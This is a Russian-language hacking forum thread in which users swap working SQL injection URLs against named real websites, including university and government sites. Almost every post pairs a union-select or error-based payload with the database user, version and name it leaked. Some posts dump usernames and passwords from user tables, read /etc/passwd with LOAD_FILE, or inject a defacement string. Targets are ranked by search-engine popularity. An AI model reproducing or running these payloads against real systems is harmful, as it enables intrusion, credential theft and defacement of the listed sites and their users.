SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Code:
    http://www.tlmshk[COLOR=YellowGreen][B].edu[/B][/COLOR].hk/news_detail.php?id=204.9'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28+and+'x'='x
    User: root@localhost
    Version: 4.1.22
    Database: schweb

    PR 4

    Code:
    http://www.tup[COLOR=YellowGreen][B].edu[/B][/COLOR].ph/article.php?id=bulletin&bID=9.9+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6+--+
    User: root@localhost
    Version: 5.0.27-community-nt
    Database: tupcms

    PR 5
    тИЦ 10


    Code:
    http://languages.uconn[COLOR=YellowGreen][B].edu[/B][/COLOR]/faculty/details.php?id=23.9+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19+--+
    User: [email protected]
    Version: 5.0.26-log
    Database: languages

    PR 7
    тИЦ 400
     
    3 people like this.
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    5.0.77:abades:abades@localhost

    5.0.67-log:pin:libadm@saimiri.
     
    5 people like this.
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    www.stanford.com

    www.stanford.com

    http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=-1983+union+select+1,2,3,4,5,6,7,user%28%29--+
     
    2 people like this.
  4. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Code:
    http://www.infovis.net/printMag.php?lang=2&num=-158+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13+--+
    5.0.67-Max
    тИЦ 10
    PR 5

    Code:
    http://www.petrofinder.com/member_list/member_read.php?num=-5324+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
    4.0.27-Max
    тИЦ 10
    PR 5

    Code:
    http://velosamara.ru/navigator/GoogleMapTreks.php?category_id=-4+union+select+1,version(),3,4,5,6,7--
    5.0.77
    тИЦ 275
    PR 3

    Code:
    http://www.downingandlahey.com/online_services/obituary.php?id=-3923+union+select+1,version(),3,4--
    5.0.91-log
    PR 3

    Code:
    http://www.onlinenews.com.pk/details.php?id=99999999+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    5.0.45-community-nt
    тИЦ 30
    PR 5
     
    #14124 GroM88, 27 Aug 2011
    Last edited: 27 Aug 2011
    3 people like this.
  5. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://www.baiwanweb.com
     
    1 person likes this.
  6. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Code:
    http://www.dole[COLOR=YellowGreen][B].gov[/B][/COLOR].ph/list_of_holidays.php?id=95 and 1=1
    [blind]
    User: dolews_sjksd721@localhost
    Version: 5.0.51a-log
    Database: dolews_4a351sd

    PR 6
    тИЦ 10


    Code:
    http://www.dftqc[COLOR=YellowGreen][B].gov[/B][/COLOR].np/content.php?id=61.9+union+all+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6+--+
    User: dftqcgo_mraf@localhost
    Version: 5.0.92-50-log
    Database: dftqcgo_daft

    PR 4

    Code:
    http://dabi[COLOR=YellowGreen][B].gov[/B][/COLOR].ua/news_text.php?id=563+union+all+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6+--+
    User: u_dabi@localhost
    Version: 5.0.51a-24+lenny5
    Database: dabi

    PR 4
    тИЦ 80
     
    1 person likes this.
  7. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Code:
    http://house.legis.state.ak.us/rep.php?id=123'+union+all+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
    User: [email protected]
    Version: 5.0.77-log
    Database: intranet

    PR 5

    Code:
    http://artcatalog.su/stat.php?id=207' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
    User: artcat@localhost
    Version: 5.1.50-log
    Database: artcatalog1

    PR 3
    тИЦ 80


    Code:
    http://www.cvu.dn.ua/download.php?id=63.9'+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16+and+'x'='x
    User: h3403_cvu@localhost
    Version: 5.1.50
    Database: h3403_cvu

    PR 3
    тИЦ 30


    Code:
    http://filtr.kharkov.ua/t.php?id=5.9+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17+--+
    User: uzver@localhost
    Version: 5.1.49-3-log
    Database: filtr

    PR 6
    тИЦ 9500


    Code:
    http://www.autodealer.ua/articles/event.php?id=999999.9' union all select 1,concat(0x7e,0x27,concat_ws(0x3a,user(),version(),database()),0x27,0x7e),3,4+--+
    User: ua_adlr@localhost
    Version: 5.1.41-3ubuntu12.9
    Database: ua.autodealer

    PR 4
    тИЦ 190
     
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    www.abw.by ТИЦ425 PR5 AR16700
    посетителей за 24 часа: 59537
    Code:
    http://www.abw.by/index.php?act=catalog2&do=tbl&ph=372&n_ph=4&n1_ph=2&pht=4&mark2=Citroen&model23=Xsara&marka_id22=51&model_id23=691&id=-7496+union+select+null,2,3,4,concat_ws(0x3a,username,user_password)+from+users+--+
    ЗЫ Всего зарегистрированных пользователей: 544143
     
    #14128 DezMond™, 28 Aug 2011
    Last edited: 28 Aug 2011
    3 people like this.
  9. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.worldcall.net.pk/news.php?id=1[COLOR=Red]+union+Select+1,group_concat%28table_name%29,3,4,5+from+information_schema.tables+where+table_schema=0x6e65775f706f7274616c5f32303038%20--[/COLOR]
    version: 5.0.77
    database: new_portal_2008
    user: root@localhost

    + PR: 4

    Code:
    http://www.shopestores.com/subcategory.php?id=[COLOR=Red]-[/COLOR]1[COLOR=Red]+union+Select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5,6+--+[/COLOR]
    version: 5.1.53-log
    database: shopestores
    user: [email protected]

    + PR: 2
     
  10. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    [​IMG]

    http://www.nosmoking.ru/newsblock.php?action=showcat&catid=-3%20and%201=2%20union%20select%201,2,3,4,5,concat_ws(char(58),@@version,user(),database()),7,8+--

    5.0.77 nsm_news@localhost nsm_news
     
    2 people like this.
  11. x61

    x61 New Member

    Joined:
    28 Aug 2011
    Messages:
    4
    Likes Received:
    4
    Reputations:
    5
    http://www.catedrasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+from+usuarios--


    http://www.semioticasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+from+usuarios--
     
    1 person likes this.
  12. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    http://botox.ru/cosmetic/centers/moscow/?view_metro_id=10+uNIOn+sELECT+1,2,3,version%28%29,5,6,7,8,9,10%20--
    Всем B07ОХ посоны!
    Yandex ТИЦ 100
    Google PageRank 3
    PHP:
    version5.0.90
    database
    u154046
    user
    u154046@10.8.0.15
    ========пополнение==========
    Code:
    http://beli.ru/tovar/?id=7795+union+select+1,2,3,version%28%29,user%28%29,6,database%28%29,8,9,10,11,12,13%20--
    есть таблица с айпишниками :)
    Yandex ТИЦ 0 4к паг между прочим
    Google PageRank 3
    PHP:
    version5.0.90
    database
    u22946_2
    user
    u22946@10.8.0.57
     
    #14132 o'clock, 29 Aug 2011
    Last edited: 29 Aug 2011
    2 people like this.
  13. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    Code:
    http://vkka.[B]gov.ua[/B]/index.php?id=-1+union+select+1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17&page=katalog
    5.5.14
    vkka_root@localhost
    vkka_adv
    (CY) 60
    (PR) 3
     
    1 person likes this.
  14. N1tr0

    N1tr0 New Member

    Joined:
    28 Aug 2011
    Messages:
    4
    Likes Received:
    1
    Reputations:
    5
    Code:
    http://webshop.dgn-thai.net/test/page.php?id=-63+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6+--+
    [email protected]
    5.1.39-community
    dgn_blog

    Code:
    http://passion-wow.com/?news=1+UNION+SELECT+1,concat_ws(0x202f20,user(),version(),database()),3,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+--+
    
    5.0.24a-community-nt
    [email protected]
    wownews

    HAXTA4OK : "Не плоди посты, если ты последний ответил, то просто редактируй пост и вставляй сюда же"
     
    #14134 N1tr0, 30 Aug 2011
    Last edited by a moderator: 31 Aug 2011
    1 person likes this.
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    ТИЦ 140 ПР 3
     
    _________________________
    1 person likes this.
  16. DCRM

    DCRM Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    67
    Likes Received:
    27
    Reputations:
    -1
    случайно нашел:
    Code:
    http://www.buildcommerce-bg.com/index.php ?option=com_astra&S=4&F=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 /*
     
    1 person likes this.
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    PR8 ТИЦ300
    http://www.uni-potsdam.de/statoek/literatur_abfrage.php?eingabe=Details&id=-195+union+select+1,2,3,4,5,6,7,8,LOAD_FILE(0x2F6574632F706173737764)+--+
     
  18. Mickey House

    Mickey House Banned

    Joined:
    21 Jan 2011
    Messages:
    34
    Likes Received:
    17
    Reputations:
    5
    Code:
    [B]http://www.st-martin.org[/B]/reservations/lire/index.php?rubid=9+and+1=0+Union+Select+1,0x4861636B656420627920494E432E--
    Code:
    [B]http://www.teledom.fr[/B]/sint_maarten/lire/index.php?rubid=6+AND+1=2+UNION+SELECT+0x31,0x4861636B656420627920494E432E--
    Code:
    [B]http://www.cinema-tout-ecran.ch[/B]/2008/index.php?lan='en&rubID=50+and+1=0+Union+Select+1,2,3,0x4861636B656420627920494E432E,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
     
    1 person likes this.
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.arisierung-in-thueringen.uni-jena.de/component/option,com_ownbiblio/Itemid,83/view,ownbiblio/index.php?option=com_ownbiblio&Itemid=83&view=delete&id=168&catid=-42+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16+--+

    ТИЦ500 PR7
    http://www.uni-hannover.de/de/aktuell/online-aktuell/index.php?funktion=archiv&monat=4&jahr=2008&rubrik=-2+union+select+user()+--+
    [email protected]
     
    #14139 DezMond™, 2 Sep 2011
    Last edited: 3 Sep 2011
  20. Lam3rsha

    Lam3rsha Member

    Joined:
    25 Oct 2008
    Messages:
    36
    Likes Received:
    8
    Reputations:
    5
    http://g-baza.ru/spisok.php?lr=561001&hr=3000+union+select+version()

    Database Version: 5.0.77-log
    Database name: fbaza-1_refer
    User name: [email protected]


    http://planeta.tspu.ru/?ur=810&ur1=870&ur2=1215+UNION+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15--

    Version: 5.1.56-log
    name: planeta
    name: planeta@localhost

    http://www.ssa-rss.ru/index.php?page_id=19&id=545+union+select+1,2,3,version(),5,6,7,8

    Version: 6.0.7-alpha
    name: ssa-rss
    name: root@localhost
     
    #14140 Lam3rsha, 3 Sep 2011
    Last edited: 3 Sep 2011
    1 person likes this.
Thread Status:
Not open for further replies.